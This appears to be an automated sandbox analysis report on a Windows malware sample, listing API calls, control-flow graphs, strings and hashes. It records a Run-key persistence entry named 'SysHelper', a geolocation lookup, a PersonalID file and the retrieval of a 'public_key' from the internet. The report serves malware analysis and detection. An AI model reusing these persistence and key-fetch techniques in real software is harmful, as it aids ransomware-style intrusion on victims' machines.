                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                                  • String ID: $"country_code":"$$$($Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                                  • API String ID: 1485416377-933853286
                                                                                                  • Opcode ID: d673f08ff39db9df5547993b45f186738f0b062a2ec1caa1b325866b38155c75
                                                                                                  • Instruction ID: 86d091b26626d8b24f2a529bb0706e64dac73fcfc9b94affcfa8b0f1b9cbfef9
                                                                                                  • Opcode Fuzzy Hash: d673f08ff39db9df5547993b45f186738f0b062a2ec1caa1b325866b38155c75
                                                                                                  • Instruction Fuzzy Hash: 7191C071C04228DBEF20CFA0EC49BEEBBF5AF05304F205198E5057B282DBB65A49DB51
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1901 e3bae0-e3bb0d 1902 e3bb13 1901->1902 1903 e3bba0-e3bba7 1901->1903 1906 e3bb15-e3bb1a 1902->1906 1907 e3bb54-e3bb5e 1902->1907 1904 e3bf3d-e3bf47 1903->1904 1905 e3bbad-e3bbae 1903->1905 1908 e3bf49 1904->1908 1909 e3bf5c-e3bf63 1904->1909 1912 e3bbb0-e3bbd4 DefWindowProcW 1905->1912 1913 e3bbd7-e3bc45 call e40c62 GetComputerNameW call e33100 call e3ce80 1905->1913 1914 e3bb47-e3bb4f PostQuitMessage 1906->1914 1915 e3bb1c-e3bb1f 1906->1915 1910 e3bf81-e3bf97 1907->1910 1911 e3bb64-e3bb68 1907->1911 1917 e3bf50-e3bf54 1908->1917 1918 e3bf65-e3bf71 IsWindow 1909->1918 1919 e3bf9a-e3bfc2 DefWindowProcW 1909->1919 1920 e3bb75-e3bb9d DefWindowProcW 1911->1920 1921 e3bb6a-e3bb6e 1911->1921 1935 e3bc47-e3bc4c 1913->1935 1936 e3bc7b-e3bc80 1913->1936 1914->1910 1915->1910 1916 e3bb25-e3bb28 1915->1916 1916->1912 1924 e3bb2e-e3bb31 1916->1924 1917->1919 1925 e3bf56-e3bf5a 1917->1925 1918->1910 1926 e3bf73-e3bf7b DestroyWindow 1918->1926 1921->1911 1927 e3bb70 1921->1927 1924->1910 1929 e3bb37-e3bb42 call e31cd0 1924->1929 1925->1909 1925->1917 1926->1910 1927->1910 1929->1918 1937 e3bc5a-e3bc76 call e345a0 1935->1937 1938 e3bc4e-e3bc57 call e42587 1935->1938 1939 e3bc82-e3bc8b call e42587 1936->1939 1940 e3bc8e-e3bcb1 1936->1940 1937->1936 1938->1937 1939->1940 1941 e3bcb3-e3bcbc call e42587 1940->1941 1942 e3bcbf-e3bcf1 call e40bed 1940->1942 1941->1942 1952 e3bcf7-e3bcfa 1942->1952 1953 e3befb-e3bf0f IsWindow 1942->1953 1954 e3bd00-e3bd04 1952->1954 1955 e3bf11-e3bf18 1953->1955 1956 e3bf28-e3bf2d 1953->1956 1958 e3bee5-e3bef1 1954->1958 1959 e3bd0a-e3bd0e 1954->1959 1955->1956 1960 e3bf1a-e3bf22 DestroyWindow 1955->1960 1956->1910 1957 e3bf2f-e3bf3b call e42587 1956->1957 1957->1910 1958->1954 1963 e3bef7-e3bef9 1958->1963 1959->1958 1962 e3bd14-e3bd7b call e34690 * 2 call e2eff0 1959->1962 1960->1956 1971 e3bee1 1962->1971 1972 e3bd81-e3be44 call e3c330 call e39d10 call e3c240 call e3b680 call e3b8b0 call e34690 call e3ce80 call e331d0 1962->1972 1963->1953 1963->1956 1971->1958 1989 e3be46-e3be52 call e42587 1972->1989 1990 e3be55-e3be81 1972->1990 1989->1990 1992 e3be83-e3be8c call e42587 1990->1992 1993 e3be8f-e3bedf CreateThread 1990->1993 1992->1993 1993->1958
                                                                                                  APIs
                                                                                                  • PostQuitMessage.USER32(00000000), ref: 00E3BB49
                                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00E3BBBA
                                                                                                  • _malloc.LIBCMT ref: 00E3BBE4
                                                                                                  • GetComputerNameW.KERNEL32(00000000,?), ref: 00E3BBF4
                                                                                                  • _free.LIBCMT ref: 00E3BCD7
                                                                                                    • Part of subcall function 00E31CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,00EEAC68,000000FF), ref: 00E31D12
                                                                                                    • Part of subcall function 00E31CD0: _memset.LIBCMT ref: 00E31D3B
                                                                                                    • Part of subcall function 00E31CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00E31D63
                                                                                                    • Part of subcall function 00E31CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EEAC68,000000FF), ref: 00E31D6C
                                                                                                    • Part of subcall function 00E31CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00E31DD6
                                                                                                    • Part of subcall function 00E31CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00E31E48
                                                                                                  • IsWindow.USER32(?), ref: 00E3BF69
                                                                                                  • DestroyWindow.USER32(?), ref: 00E3BF7B
                                                                                                  • DefWindowProcW.USER32(?,00008003,?,?), ref: 00E3BFA8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3873257347-0
                                                                                                  • Opcode ID: f2d5630e78b7b2143527c76bc48ec8b1c5837cf58ce21392c0ccc8a705b3a964
                                                                                                  • Instruction ID: bddee5d3e45eb6aa4c969062a910929d7a0aa6f12f0d5d85b050ddd18b887000
                                                                                                  • Opcode Fuzzy Hash: f2d5630e78b7b2143527c76bc48ec8b1c5837cf58ce21392c0ccc8a705b3a964
                                                                                                  • Instruction Fuzzy Hash: 3DC1CF716083849FDB20DF28EC49B6BBBE0FF85318F10591DF989A72A1D7759908CB52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2147 e2c740-e2c792 call e40fdd 2150 e2c911-e2c915 2147->2150 2151 e2c798-e2c7a3 call e40546 2147->2151 2152 e2c917 2150->2152 2153 e2c944-e2c968 CreateDirectoryW call e40fdd 2150->2153 2159 e2c906-e2c90e call e43a38 2151->2159 2160 e2c7a9 2151->2160 2155 e2c920-e2c93b call e34c60 2152->2155 2164 e2c96a-e2c96c 2153->2164 2165 e2c9af-e2c9b3 2153->2165 2155->2164 2169 e2c93d-e2c942 2155->2169 2159->2150 2163 e2c7b0-e2c7bc call e41101 2160->2163 2175 e2c7c1-e2c7c6 2163->2175 2171 e2c972-e2c976 2164->2171 2172 e2ca43-e2ca47 2164->2172 2167 e2c9b5 2165->2167 2168 e2c9d8-e2ca03 call e428fd * 2 call e43a38 2165->2168 2174 e2c9b8-e2c9bc 2167->2174 2168->2172 2213 e2ca05-e2ca09 2168->2213 2169->2153 2169->2155 2176 e2ca3a-e2ca40 call e42587 2171->2176 2177 e2c97c 2171->2177 2179 e2ca54-e2ca64 2172->2179 2180 e2ca49-e2ca51 call e42587 2172->2180 2181 e2c9c2 2174->2181 2182 e2c9be-e2c9c0 2174->2182 2183 e2c8f3-e2c900 call e40546 2175->2183 2184 e2c7cc-e2c7e7 2175->2184 2176->2172 2186 e2c980-e2c984 2177->2186 2180->2179 2189 e2c9c4-e2c9d3 call e428fd 2181->2189 2182->2189 2183->2159 2183->2163 2190 e2c7e9-e2c7eb 2184->2190 2191 e2c7ed-e2c7f3 2184->2191 2194 e2c990-e2c9a8 2186->2194 2195 e2c986-e2c98d call e42587 2186->2195 2189->2174 2211 e2c9d5 2189->2211 2200 e2c805-e2c81e call e35c10 2190->2200 2201 e2c7f6-e2c7ff 2191->2201 2194->2186 2198 e2c9aa 2194->2198 2195->2194 2198->2176 2214 e2c820-e2c822 2200->2214 2215 e2c861-e2c863 2200->2215 2201->2201 2206 e2c801-e2c803 2201->2206 2206->2200 2211->2168 2213->2176 2217 e2ca0b 2213->2217 2214->2215 2216 e2c824-e2c83c 2214->2216 2218 e2c874-e2c876 2215->2218 2219 e2c865-e2c871 call e34f70 2215->2219 2220 e2c83e-e2c84a call e34f70 2216->2220 2221 e2c84d-e2c855 2216->2221 2222 e2ca10-e2ca14 2217->2222 2224 e2c8d5-e2c8e3 2218->2224 2225 e2c878-e2c88f 2218->2225 2219->2218 2220->2221 2221->2224 2229 e2c857-e2c85f call e33160 2221->2229 2227 e2ca20-e2ca38 2222->2227 2228 e2ca16-e2ca1d call e42587 2222->2228 2230 e2c8f0 2224->2230 2231 e2c8e5-e2c8ed call e42587 2224->2231 2233 e2c891-e2c895 2225->2233 2234 e2c8a9-e2c8ae 2225->2234 2227->2176 2227->2222 2228->2227 2229->2224 2230->2183 2231->2230 2236 e2c8b5-e2c8d1 2233->2236 2240 e2c897-e2c8a7 call e405a0 2233->2240 2234->2236 2236->2224 2240->2236
                                                                                                  APIs
                                                                                                    • Part of subcall function 00E40FDD: __wfsopen.LIBCMT ref: 00E40FE8
                                                                                                  • _fgetws.LIBCMT ref: 00E2C7BC
                                                                                                  • _memmove.LIBCMT ref: 00E2C89F
                                                                                                  • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 00E2C94B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2864494435-54166481
                                                                                                  • Opcode ID: e923e2cd2e103663a9bde3c5f5b431fe1118b84473cedbf5aa2bdfb0ab44acb4
                                                                                                  • Instruction ID: 3d6365107878f5cc05f428dea4398dac24c2cfa2c521038f96efd6efb0a06d4f
                                                                                                  • Opcode Fuzzy Hash: e923e2cd2e103663a9bde3c5f5b431fe1118b84473cedbf5aa2bdfb0ab44acb4
                                                                                                  • Instruction Fuzzy Hash: C89192B1D003299BCF24DFA4EC857EEB7F5AF44318F241529E806B3241E775AA54CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2246 e2c6a0-e2c6ca RegOpenKeyExW 2247 e2c734-e2c739 2246->2247 2248 e2c6cc-e2c6fb RegQueryValueExW 2246->2248 2249 e2c70c-e2c72e RegSetValueExW RegCloseKey 2248->2249 2250 e2c6fd-e2c70b RegCloseKey 2248->2250 2249->2247
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,00E3E6D4), ref: 00E2C6C2
                                                                                                  • RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 00E2C6F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E2C700
                                                                                                  • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 00E2C725
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00E2C72E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseValue$OpenQuery
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                  • API String ID: 3962714758-1667468722
                                                                                                  • Opcode ID: a8dd6f768f468b1a70a239362bf778fe1e688af942a120cb2c92359ef24d217d
                                                                                                  • Instruction ID: 2556e9df207d79ac207cef0bc5048e60f58279e8970c4042f5144ea859144cb6
                                                                                                  • Opcode Fuzzy Hash: a8dd6f768f468b1a70a239362bf778fe1e688af942a120cb2c92359ef24d217d
                                                                                                  • Instruction Fuzzy Hash: 96115B74A4020CFFDB10DF90DC46BEEBB78EB00708F2001A1FA10B61A1D7B15B19AB50
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 2251 e3e6e8-e3e6ef 2252 e3e6f0-e3e722 call e4b420 call e2c500 2251->2252 2257 e3e724-e3e729 2252->2257 2258 e3e72e-e3e772 InternetOpenW 2252->2258 2261 e3ea1f-e3ea40 call e43cf0 2257->2261 2259 e3e774-e3e776 2258->2259 2260 e3e778-e3e77d 2258->2260 2262 e3e78f-e3e7b8 call e35ae0 call e41c02 2259->2262 2263 e3e780-e3e789 2260->2263 2269 e3ea42-e3ea46 2261->2269 2270 e3ea8d-e3eacc lstrlenA lstrcpyA * 2 lstrlenA 2261->2270 2284 e3e882-e3e8e5 call e35ae0 call e33ff0 call e32900 call e359d0 2262->2284 2285 e3e7be-e3e7f7 call e34690 call e2dd40 2262->2285 2263->2263 2265 e3e78b-e3e78d 2263->2265 2265->2262 2274 e3ee2a-e3ee3a call e31b10 2269->2274 2275 e3ea4c-e3ea61 SHGetFolderPathA 2269->2275 2271 e3eaef-e3eb12 2270->2271 2272 e3eace 2270->2272 2279 e3eb14-e3eb16 2271->2279 2280 e3eb18-e3eb1f 2271->2280 2276 e3ead0-e3ead8 2272->2276 2292 e3ee4d-e3ee82 call e2ef50 2274->2292 2293 e3ee3c-e3ee3f 2274->2293 2275->2252 2281 e3ea67-e3ea88 PathAppendA DeleteFileA 2275->2281 2282 e3eaeb 2276->2282 2283 e3eada-e3eae7 lstrlenA 2276->2283 2287 e3eb2b-e3eb4f call e356d0 call e32900 2279->2287 2288 e3eb22-e3eb27 2280->2288 2281->2252 2282->2271 2283->2276 2290 e3eae9 2283->2290 2342 e3e8f3-e3e917 lstrcpyW 2284->2342 2343 e3e8e7-e3e8f0 call e42587 2284->2343 2314 e3e7f9-e3e7fe 2285->2314 2315 e3e86f-e3e874 2285->2315 2312 e3eb53-e3eb66 lstrcpyW 2287->2312 2313 e3eb51 2287->2313 2288->2288 2295 e3eb29 2288->2295 2290->2271 2305 e3ee86-e3ee8c 2292->2305 2298 e3e6e0-e3e6e6 2293->2298 2295->2287 2298->2252 2309 e3ee92-e3ee94 2305->2309 2310 e3ee8e-e3ee90 2305->2310 2318 e3ee97-e3ee9c 2309->2318 2316 e3eea0-e3eeaf call e33ea0 2310->2316 2319 e3eb74-e3ebe4 lstrlenA call e40c62 call e4b420 MultiByteToWideChar lstrcpyW call e43cf0 2312->2319 2320 e3eb68-e3eb71 call e42587 2312->2320 2313->2312 2322 e3e800-e3e809 call e42587 2314->2322 2323 e3e80c-e3e827 2314->2323 2315->2284 2321 e3e876-e3e87f call e42587 2315->2321 2316->2305 2344 e3eeb1-e3eee3 call e2ef50 2316->2344 2318->2318 2328 e3ee9e 2318->2328 2365 e3ebe6-e3ebea 2319->2365 2366 e3ec3d-e3ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 2319->2366 2320->2319 2321->2284 2322->2323 2325 e3e842-e3e848 2323->2325 2326 e3e829-e3e82d 2323->2326 2335 e3e84e-e3e86c 2325->2335 2334 e3e82f-e3e840 call e405a0 2326->2334 2326->2335 2328->2316 2334->2335 2335->2315 2348 e3e943-e3e97a InternetOpenUrlW InternetReadFile 2342->2348 2349 e3e919-e3e920 2342->2349 2343->2342 2363 e3eee7-e3eeed 2344->2363 2352 e3e9ec-e3ea08 InternetCloseHandle * 2 2348->2352 2353 e3e97c-e3e994 SHGetFolderPathA 2348->2353 2349->2348 2355 e3e922-e3e92e 2349->2355 2359 e3ea16-e3ea19 2352->2359 2360 e3ea0a-e3ea13 call e42587 2352->2360 2353->2352 2358 e3e996-e3e9c2 PathAppendA call e420b6 2353->2358 2361 e3e930-e3e935 2355->2361 2362 e3e937 2355->2362 2358->2352 2382 e3e9c4-e3e9e9 lstrlenA call e42b02 call e43a38 2358->2382 2359->2261 2360->2359 2369 e3e93c-e3e93d lstrcatW 2361->2369 2362->2369 2370 e3eef3-e3eef5 2363->2370 2371 e3eeef-e3eef1 2363->2371 2365->2274 2372 e3ebf0-e3ec11 SHGetFolderPathA 2365->2372 2374 e3ec99 2366->2374 2375 e3ecbf-e3ecdd 2366->2375 2369->2348 2378 e3eef8-e3eefd 2370->2378 2377 e3ef01-e3ef10 call e33ea0 2371->2377 2372->2252 2380 e3ec17-e3ec38 PathAppendA DeleteFileA 2372->2380 2383 e3eca0-e3eca8 2374->2383 2384 e3ece3-e3eced 2375->2384 2385 e3ecdf-e3ece1 2375->2385 2377->2363 2392 e3ef12-e3ef4c call e33ff0 call e32900 2377->2392 2378->2378 2379 e3eeff 2378->2379 2379->2377 2380->2298 2382->2352 2388 e3ecbb 2383->2388 2389 e3ecaa-e3ecb7 lstrlenA 2383->2389 2391 e3ecf0-e3ecf5 2384->2391 2390 e3ecf9-e3ed1b call e356d0 call e32900 2385->2390 2388->2375 2389->2383 2394 e3ecb9 2389->2394 2405 e3ed1f-e3ed35 lstrcpyW 2390->2405 2406 e3ed1d 2390->2406 2391->2391 2395 e3ecf7 2391->2395 2410 e3ef50-e3ef68 lstrcpyW 2392->2410 2411 e3ef4e 2392->2411 2394->2375 2395->2390 2408 e3ed43-e3edab lstrlenA call e40c62 call e4b420 MultiByteToWideChar lstrcpyW lstrlenW 2405->2408 2409 e3ed37-e3ed40 call e42587 2405->2409 2406->2405 2426 e3edad-e3edb6 lstrlenW 2408->2426 2427 e3edbc-e3edc1 2408->2427 2409->2408 2414 e3ef76-e3efb3 call e33ff0 call e32900 2410->2414 2415 e3ef6a-e3ef73 call e42587 2410->2415 2411->2410 2428 e3efb7-e3efc6 lstrcpyW 2414->2428 2429 e3efb5 2414->2429 2415->2414 2426->2427 2430 e3ee44-e3ee48 2426->2430 2431 e3edc3-e3ede4 SHGetFolderPathA 2427->2431 2432 e3ee10-e3ee12 2427->2432 2436 e3efd4-e3efe0 2428->2436 2437 e3efc8-e3efd1 call e42587 2428->2437 2429->2428 2438 e3f01a-e3f030 2430->2438 2431->2252 2433 e3edea-e3ee0b PathAppendA DeleteFileA 2431->2433 2434 e3ee14-e3ee1a call e40bed 2432->2434 2435 e3ee1d-e3ee1f 2432->2435 2433->2298 2434->2435 2435->2274 2440 e3ee21-e3ee27 call e40bed 2435->2440 2442 e3efe2-e3efeb call e42587 2436->2442 2443 e3efee-e3f008 2436->2443 2437->2436 2440->2274 2442->2443 2448 e3f016 2443->2448 2449 e3f00a-e3f013 call e42587 2443->2449 2448->2438 2449->2448
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 00E3E707
                                                                                                    • Part of subcall function 00E2C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00E2C51B
                                                                                                  • InternetOpenW.WININET ref: 00E3E743
                                                                                                  • _wcsstr.LIBCMT ref: 00E3E7AE
                                                                                                  • _memmove.LIBCMT ref: 00E3E838
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 00E3E90A
                                                                                                  • lstrcatW.KERNEL32(?,&first=false), ref: 00E3E93D
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00E3E954
                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E3E96F
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E3E98C
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3E9A3
                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 00E3E9CD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00E3E9F3
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00E3E9F6
                                                                                                  • _strstr.LIBCMT ref: 00E3EA36
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E3EA59
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3EA74
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00E3EA82
                                                                                                  • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 00E3EA92
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 00E3EAA4
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 00E3EABA
                                                                                                  • lstrlenA.KERNEL32(?), ref: 00E3EAC8
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 00E3EAE3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00E3EB5B
                                                                                                  • lstrlenA.KERNEL32(?), ref: 00E3EB7C
                                                                                                  • _malloc.LIBCMT ref: 00E3EB86
                                                                                                  • _memset.LIBCMT ref: 00E3EB94
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 00E3EBAE
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 00E3EBB6
                                                                                                  • _strstr.LIBCMT ref: 00E3EBDA
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00E3EC00
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E3EC24
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00E3EC32
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                  • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                  • API String ID: 2805819797-1771568745
                                                                                                  • Opcode ID: 721012aefe3cb9320a343f578bebb792511e5462fbdec940de7782b219ca319a
                                                                                                  • Instruction ID: f868e5763bccdde06d98e02e26633967c633db169422fcc5ed9145dc3f24576b
                                                                                                  • Opcode Fuzzy Hash: 721012aefe3cb9320a343f578bebb792511e5462fbdec940de7782b219ca319a
                                                                                                  • Instruction Fuzzy Hash: AF018C30448395AAD630EF209C49BDF7BD8AF51704F145818B984A2282EB70E60DC7A3
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM(?,?,?,?,00E3EE2F), ref: 00E31B1E
                                                                                                  • timeGetTime.WINMM(?,?,00E3EE2F), ref: 00E31B29
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E31B4C
                                                                                                  • DispatchMessageW.USER32(?), ref: 00E31B5C
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E31B6A
                                                                                                  • Sleep.KERNEL32(00000064,?,?,00E3EE2F), ref: 00E31B72
                                                                                                  • timeGetTime.WINMM(?,?,00E3EE2F), ref: 00E31B78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
